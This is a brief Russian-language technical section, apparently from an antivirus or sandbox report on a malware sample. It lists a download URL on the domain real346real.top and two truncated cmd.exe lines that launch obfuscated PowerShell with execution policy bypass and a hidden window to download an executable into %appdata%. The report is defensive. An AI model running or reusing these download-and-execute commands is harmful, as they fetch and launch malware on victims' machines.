Техническая информация
- http://real346real.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poWersHelL.eXe -EXECUtiONPOLIcY byPasolE HiDDeN -wIndowSTYlE HiDDeN (NEw-ObjeCT SystEM.neT.WebCLIEnt).DownlOADfILe('http://real346real.top/search.php','%appdAtA%.eXe');ST...
- '<SYSTEM32>\cmd.exe' /C "poWersHelL.eXe -EXECUtiONPOLIcY byPasolE HiDDeN -wIndowSTYlE HiDDeN (NEw-ObjeCT SystEM.neT.WebCLIEnt).DownlOADfILe('http://real346real.top/search.php','%appdAtA%.eXe');ST...' (со скрытым окном)